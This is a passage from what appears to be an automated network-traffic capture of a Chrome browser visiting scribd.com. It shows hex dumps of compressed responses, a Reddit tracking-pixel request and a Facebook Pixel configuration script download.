                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 87 95 75 29 9c 98 df fb f8 e9 fd c1 12 cc ab 45 4d 05 13 66 73 8c 64 09 84 bb 92 5a b5 1b 89 18 38 3d 85 17 1d e9 95 00 1e fa d5 1f 8f 8f 38 0c f6 bd 2d 63 73 f6 c2 b4 67 1c 76 b7 04 ef 6d 0c 36 16 1c 8c 82 b2 38 5b 99 9c 15 9c 2c 02 8f 3c af 4e 04 02 1b 77 71 1e 01 06 2b 8f e7 b2 a8 c2 ab 9e a6 29 df 9c 3f 99 d4 c4 78 56 d3 38 96 85 9d ee 4c 06 2e 9e b3 02 9e e1 e5 1b 87 3f 7e fa 00 6f 78 1e 5c 38 5c 7d ff 76 73 f3 d3 c6 e1 e1 57 8c ac b9 ec 5d c6 e6 e5 11 2b cb 72 5e 1c c3 b2 df ec 86 dc b6 7e e7 00 d6 df 6d c1 30 67 77 06 73 f4 0c c0 cf 89 2d e3 fc 0b d3 e5 1b d2 46 9e c6 f1 ea cc 0e 99 fc 26 93 f9 97 49 67 26 89 69 c7 06 d3 fa 0f ff d4 60 44 e7 d4 54 53 12 75 12 72 6e 44 fc 43 15 2b 14 53 2d a6 7b 9b 9a 2b 58 a9 e2 ee 1a 10 59 17 b4 d7 6c 1b 0e 0f f7
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: u)EMfsdZ8=8-csgvm68[,<Nwq+)?xV8L.?~ox\8\}vsW]+r^~m0gws-F&Ig&i`DTSurnDC+S-{+XYl
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 45 ca c2 9c a1 1a 7f 2d 43 ad f6 ed c5 cc 37 71 29 24 8f dd ac 13 28 86 a0 68 4b 24 65 cc 5f ae 78 97 12 58 51 95 91 15 22 85 22 18 48 4e 06 81 9b e7 f8 86 91 47 57 eb a1 52 5d 77 7b 9b 9b 9f f7 2c 25 31 94 cf 57 fd f2 a5 cf 5b c6 da 6d 6e 9c ea db 59 ae 99 d5 cb 34 8c fb f4 ae 8c 5d c3 54 2b 2d dd 20 76 8d 27 22 39 e2 33 78 79 69 af b4 7c 82 b2 32 b1 5b ed f0 30 e7 12 8c b8 ba d5 e2 74 9a 4f c2 43 ac 9b a1 38 94 53 25 5c ab 13 17 a9 80 55 b1 08 3b 22 3e 6e 16 87 af 1b 53 d5 43 ff a0 7d cd cf 3f 40 f9 0e 01 aa 03 0e 80 79 fb cb 58 17 da 96 af de 0b c2 97 89 8f 95 60 60 04 8d 58 60 a2 25 81 97 2b 12 9e 96 60 a5 d5 6d 27 47 9f a1 0a fc 70 14 01 2a 37 62 c7 8e 42 0e f3 f5 3f 5e a7 f0 70 d1 88 d6 fd d2 58 45 c5 0f 52 a5 85 f7 83 15 e4 f0 b2 83 ff 29 c1 53 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: E-C7q)$(hK$e_xXQ""HNGWR]w{,%1W[mnY4]T+- v'"93xyi|2[0tOC8S%\U;">nSC}?@yX``X`%+`m'Gp*7bB?^pXER)S
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: a8 1c 66 93 10 3c 15 b6 d8 60 69 28 fb e5 7b 1e 4b 9f 98 28 7a db 45 a2 cd 62 86 cf 24 b8 ad 17 aa 2d 96 29 3c 92 ca c1 fc d5 08 e6 e9 3f d8 79 72 ef de db 44 70 00 13 c3 a2 43 f3 b8 79 5d 53 90 1d 50 7f 15 8d b1 c5 03 f6 1d 83 19 93 7e 55 2f 85 99 52 b5 f6 79 fb 5a 55 08 ae b5 15 cd d5 2d 28 15 18 89 13 09 46 10 d2 38 bc 4b 20 60 81 d4 61 14 91 90 6b 8e 72 34 41 03 d9 a0 ad 17 fb 2b ca 7e fe 65 11 2d 5a 6e 4e b5 83 8f 06 84 ae 4f 8e 01 db 0e 54 26 a2 e9 4a 7f 45 a8 40 17 20 10 43 d0 27 93 03 99 14 61 ed b1 af bf 18 56 40 86 c1 50 32 60 60 74 b6 38 08 d5 0a 6f d4 78 b2 22 6a 10 56 07 8c fb d6 f6 34 27 28 82 d7 db dc ec 85 a1 ea 03 bc 16 27 ac 9d b0 77 4f 64 74 64 c0 36 74 c9 e3 24 10 cf 04 02 32 8d 01 11 85 1b 9a e8 88 d2 f3 d9 22 3a 43 6c be f3 eb 3f bf
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: f<`i({K(zEb$-)<?yrDpCy]SP~U/RyZU-(F8K `akr4A+~e-ZnNOT&JE@ C'aV@P2``t8ox"jV4'('wOdtd6t$2":Cl?
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 68 2b 86 22 a1 ba f3 63 2b 95 a5 06 aa ca 88 a4 5d f6 cc cb 1a 7b c9 c3 7d af be f5 29 eb a4 be ba fa 6c 59 8b aa dd 56 2f eb cd 4d bb b1 2f 54 58 f0 b0 d1 7d af c6 08 d7 f4 85 1a 17 5e 0b a5 6d 01 2a d8 ce 04 5f c8 e2 f3 9b fa df eb f9 ee 48 21 5b 10 c4 c4 cd 21 ff 77 c8 c4 99 98 75 8b 4f 4a ae 88 ba f8 07 21 fb 8f ef 83 c3 27 eb 24 91 79 79 42 16 3b 2f 66 e7 de bd 47 74 64 46 20 7a 48 86 e3 90 07 dd c3 6a 6d 9c ae db ed 0a 8f b7 e7 ee ca cc fc 5d d6 b1 8c d4 71 18 2a a9 d4 d7 62 ab ef d8 7a d5 d9 5e 37 d8 6e 2b cf 2e fd e4 71 41 49 79 b8 d5 13 11 71 af 58 2b ef d6 a9 35 91 18 4e 23 07 71 84 26 18 75 e4 48 67 67 7b 8e 5c 9a 22 90 1d 10 1a 42 f0 75 a6 40 ee 7e e4 ad fc 54 15 d5 17 16 b7 f7 14 84 f2 0b 79 7e f1 87 98 4c 11 1a ae 9d 04 cf c0 27 d3 c9 74 fa
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: h+"c+]{})lYV/M/TX}^m*_H![!wuOJ!'$yyB;/fGtdF zHjm]q*bz^7n+.qAIyqX+5N#q&uHgg{\"Bu@~Ty~L't
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: ab 79 39 e2 99 9c 2b 5f ad ae 1e aa bd 60 5f e6 d7 1e 7b d9 0d 7e b7 00 a6 d8 e9 4f 26 ed c9 f4 f3 df 3b 97 7d f5 a6 d3 b4 ba c2 27 8a 16 fb b9 57 6f 56 2d ae 23 07 dc 64 88 03 2a 89 96 21 bc 0c 19 5c 1a ed 5f 1a 38 be 76 cd 4b 04 bd 38 76 06 96 c0 6c ce b3 98 67 76 8c 46 e5 f2 8f a9 ab 6b bb 3c 55 91 ca 7d f9 a3 51 42 8d c8 25 12 b1 14 97 95 ee d7 11 c1 83 8a 23 df 23 a0 3a 67 5f ce f1 85 95 5d 01 ff c9 5b f5 cd 45 fd 77 73 4d 70 f7 f4 b5 f5 13 cf c0 93 82 ff cb ea 8b 73 cb ae c1 b6 b9 8a f1 db 0b 04 df 70 a8 0c 57 58 c8 e8 d4 6a 5a dd d0 4f 78 f7 8f 53 87 bb 5e 9a 15 a3 b8 e8 43 aa a0 d7 dc 3b e3 3d fc 17 09 99 4b 82 10 a9 5e a0 12 21 c1 99 63 48 a9 6a 4a 2e 16 c9 a5 18 6d 66 43 c1 fb d6 f2 57 6d 73 d5 43 0f 2f b8 a0 b0 78 2a 90 ea 34 db 6c c6 9d dd 43
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: y9+_`_{~O&;}'WoV-#d*!\_8vK8vlgvFk<U}QB%##:g_][EwsMpspWXjZOxS^C;=K^!cHjJ.mfCWmsC/x*4lC
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: d5 68 ea c2 3f bf fe e7 eb 9f bf bf 76 7f f7 70 f4 e9 68 34 ea 6e 30 f7 f7 e6 67 03 1e a3 ce b8 e6 39 a5 f2 c4 44 4a 44 57 53 3b 08 cd dd 6f f7 4f f4 e8 f5 7d eb f5 dd e5 15 25 e3 96 ad 16 f8 58 4e 4e 56 ef 3c 1e aa 1d 5e ec 4b fe 36 51 3b d8 f6 70 4e f7 bb 7f d3 69 fe 21 6d a4 69 1c 0f 89 17 cc cc 24 75 c6 99 49 9d 99 a4 a9 31 d6 d0 c6 91 6e 62 62 b4 36 4d 13 d3 78 c6 fc 32 6b 95 aa 49 6b 88 a1 f6 62 0d 71 8d 49 6b b8 20 4c 29 5b 15 51 92 d3 6d d9 ee 2d 47 8b f5 68 a1 a6 a0 48 29 77 25 b0 7b e5 a4 70 b0 1c 1c 08 0b fd a7 1c db d2 42 4b 61 7b ef a4 ba 66 0f f6 25 09 4c 08 cc 27 cf f3 7d bf ef f3 bc ef a0 de 9a dd db 49 85 c0 91 c1 4d 11 31 15 f3 78 22 78 c5 2f 18 92 18 23 04 51 db c7 12 48 25 d8 f6 e2 4c c0 f4 66 67 e7 f5 d3 d4 62 6a f5 c3 87 f1 41 ce 19
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: h?vph4n0g9DJDWS;oO}%XNNV<^K6Q;pNi!mi$uI1nbb6Mx2kIkbqIk L)[Qm-GhH)w%{pBKa{f%L'}IM1x"x/#QH%LfgbjA
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: 07 f9 80 9d 03 2a 92 63 aa 50 68 bf 78 80 d5 ad 5d 33 fa 80 26 47 30 4a 4d 40 bf b8 f1 cd f8 37 a3 8b f7 fd cc b7 6f 76 5e bf f9 03 0c 16 68 31 5f 9b a1 77 14 a4 27 1c 6d 9e bd 69 60 a3 0d c5 8b 3d e7 97 40 cd 30 00 92 78 e4 c8 a9 23 0f 54 6b 00 ea 3f 51 c0 7c cb c0 de 29 a7 22 4d 3a b3 53 b3 3a 18 73 15 12 79 c6 c9 e9 13 58 c1 57 70 72 3e 8d 0f 2a 60 ab ce d4 2a 2d 10 d0 ce 54 05 0a ef 53 49 f1 d6 6d 4f 50 af b1 7b 2d 3e 7f 89 ea f6 e6 0d 3e 56 d4 8b 57 f7 fe e2 45 76 8b 7e 78 0e ae 66 22 e1 68 43 16 c4 83 65 d3 5b c5 f9 9e a5 07 77 8f 1d 3b 75 ea d8 dd 23 75 c0 4b c7 8a 0d 0b ac 21 3a 9b 36 84 0f 01 45 ed 19 3b 84 e5 12 56 4d ae 30 18 89 e8 ac d6 6a ce a9 d7 f9 cc 76 1d 97 a8 1a 81 05 41 da 0a 7c 1c 38 07 cd e9 30 54 5c 46 a5 6d ed 9f 98 b9 bd a1 0c e8
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: *cPhx]3&G0JM@7ov^h1_w'mi`=@0x#Tk?Q|)"M:S:syXWpr>*`*-TSImOP{->>VWEv~xf"hCe[w;u#uK!:6E;VM0jvA|80T\Fm
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1378INData Raw: ff 79 2c 9a a8 b4 3c cb e3 9c 33 e1 00 cb 4c 49 13 fe 15 39 74 e4 e2 db ef 1d 7f e7 83 ee f5 74 7a 7d 62 a9 30 df f3 46 0f d9 73 02 85 e9 fa d2 68 cf c0 e5 5f 3d b8 f3 4a e0 bb 5a c8 75 f7 6c b0 fa fa 13 db 23 f7 ce ea 43 d3 ab b9 f5 fb 5f ee af 3e 5b f3 e1 87 bf 7b fc f8 71 2c 4a 0b e5 5d 8b 9a 47 36 24 23 9a 76 dc b6 c3 91 f0 2b 17 8f 1f 3f fe 16 6a e4 bb 2d 2d 69 32 e3 cd f9 42 01 50 d4 96 0a a3 70 b2 27 27 f7 96 06 4c a6 6c 9a c8 f0 00 0b d3 3c ab 82 96 9e 60 27 2f 46 f3 b1 90 1b ad b2 23 bb e6 84 3e 55 58 d6 de fa e2 fc 9f da 16 6a 4d 0e 91 5c d7 ad a4 df 30 c0 ab 48 2e 26 20 96 b4 6d d3 96 8e 89 22 fe ca 40 f3 0f 9a 7b e6 d3 2d 98 3e a7 eb d6 0e 60 ca dc 7d 60 3d dd 72 17 da ad 9d 1a 6d fd e8 01 5d f6 4e 27 b4 32 b0 71 25 97 9c 49 cc d4 6e 2c 77 b6
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: y,<3LI9ttz}b0Fsh_=JZul#C_>[{q,J]G6$#v+?j--i2BPp''Ll<`'/F#>UXjM\0H.& m"@{->`}`=rm]N'2q%In,w


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        125192.168.2.1649870151.101.1.1404436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC888OUTGET /rp.gif?ts=1733522373808&id=t2_9t33vcn2&event=PageVisit&m.itemCount=&m.value=&m.valueDecimal=&m.currency=&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=90ad4cc1-c7c0-404a-8932-712d98b9d875&aaid=&em=&external_id=&idfa=&integration=reddit&opt_out=0&sh=1280&sw=1024&v=rdt_b192616d&dpm=&dpcc=&dprc= HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: alb.reddit.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC828INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 42
                                                                                                                                                                                                                                                                                                                                                                                        Server: Varnish
                                                                                                                                                                                                                                                                                                                                                                                        Retry-After: 0
                                                                                                                                                                                                                                                                                                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        content-type: image/gif
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Report-To: {"group": "w3-reporting-nel", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-nel.reddit.com/reports" }]}, {"group": "w3-reporting", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting.reddit.com/reports" }]}, {"group": "w3-reporting-csp", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-csp.reddit.com/reports" }]}
                                                                                                                                                                                                                                                                                                                                                                                        NEL: {"report_to": "w3-reporting-nel", "max_age": 14400, "include_subdomains": false, "success_fraction": 0.3, "failure_fraction": 0.3}
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        126192.168.2.1649863157.240.195.154436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:41 UTC1373OUTGET /signals/config/287045611447707?v=2.9.178&r=stable&domain=www.scribd.com&hme=28abfdc7e582ae2a8fdd6ac5ebb406923cf601dc2ee488049b0628e75e0f6b36&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: connect.facebook.net
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:42 UTC1452INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        timing-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                                        reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                                                                                                                                                                        report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                                                                                                                                                                        content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-j29pzEwP' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                                                                                                                                                                                                                                                                        document-policy: force-load-at-top
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:42 UTC1672INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:42 UTC892INData Raw: 2f 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: /*** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wi
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:42 UTC15492INData Raw: 4c 49 41 42 49 4c 49 54 59 2c 20 57 48 45 54 48 45 52 0a 2a 20 49 4e 20 41 4e 20 41 43 54 49 4f 4e 20 4f 46 20 43 4f 4e 54 52 41 43 54 2c 20 54 4f 52 54 20 4f 52 20 4f 54 48 45 52 57 49 53 45 2c 20 41 52 49 53 49 4e 47 20 46 52 4f 4d 2c 20 4f 55 54 20 4f 46 20 4f 52 20 49 4e 0a 2a 20 43 4f 4e 4e 45 43 54 49 4f 4e 20 57 49 54 48 20 54 48 45 20 53 4f 46 54 57 41 52 45 20 4f 52 20 54 48 45 20 55 53 45 20 4f 52 20 4f 54 48 45 52 20 44 45 41 4c 49 4e 47 53 20 49 4e 20 54 48 45 20 53 4f 46 54 57 41 52 45 2e 0a 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 65 2e 65 78 70 6f 72 74 73 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 66 3d 61 2e 66 62 71 3b 66 2e 65 78 65 63 53 74 61 72
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: LIABILITY, WHETHER* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.*/(function(a,b,c,d){var e={exports:{}};e.exports;(function(){var f=a.fbq;f.execStar
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:42 UTC1500INData Raw: 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 20 28 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3a 22 40 40 69 74 65 72 61 74 6f 72 22 29 3d 3d 3d 22 73 79 6d 62 6f 6c 22 3f 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 61 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 61 21 3d 3d 28 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: =typeof Symbol==="function"&&typeof (typeof Symbol==="function"?Symbol.iterator:"@@iterator")==="symbol"?function(a){return typeof a}:function(a){return a&&typeof Symbol==="function"&&a.constructor===Symbol&&a!==(typeof Symbol==="function"?Symbol.prototyp
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:42 UTC14884INData Raw: 65 74 3b 61 3d 61 2e 70 69 78 65 6c 3b 72 65 74 75 72 6e 20 69 28 7b 65 78 74 72 61 63 74 6f 72 73 42 79 50 69 78 65 6c 73 3a 67 2c 66 62 71 49 6e 73 74 61 6e 63 65 3a 65 2c 70 69 78 65 6c 3a 61 2c 74 61 72 67 65 74 3a 62 7d 29 7d 29 7d 29 7d 29 28 29 3b 72 65 74 75 72 6e 20 65 2e 65 78 70 6f 72 74 73 7d 28 61 2c 62 2c 63 2c 64 29 7d 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 69 77 6c 70 61 72 61 6d 65 74 65 72 73 22 29 3b 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 26 26 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 28 22 66 62 65 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 69 77 6c 70 61 72 61 6d 65 74 65 72 73 22 2c 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: et;a=a.pixel;return i({extractorsByPixels:g,fbqInstance:e,pixel:a,target:b})})})})();return e.exports}(a,b,c,d)});e.exports=f.getFbeventsModules("SignalsFBEvents.plugins.iwlparameters");f.registerPlugin&&f.registerPlugin("fbevents.plugins.iwlparameters",e
